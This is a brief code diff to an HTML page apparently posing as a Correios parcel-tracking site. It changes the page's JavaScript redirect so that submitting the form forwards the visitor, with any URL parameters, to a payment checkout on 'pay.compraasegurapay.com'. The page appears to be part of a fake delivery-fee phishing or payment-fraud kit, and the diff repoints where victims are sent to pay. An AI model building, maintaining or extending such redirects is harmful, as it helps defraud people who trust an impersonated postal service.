--- a/correios/rastreio/index.html
+++ b/correios/rastreio/index.html
@@ -290,7 +290,7 @@
         function redirect(event) {
             event.preventDefault();
             var currentUrlParams = window.location.search;
-            window.location.href = "https://go.azurabank.com/c/54706eec" + currentUrlParams;
+            window.location.href = "https://pay.compraasegurapay.com/checkout/3b23147b-f648-4f52-b2b3-4a49b635f3da" + currentUrlParams;
         }
     </script>
 
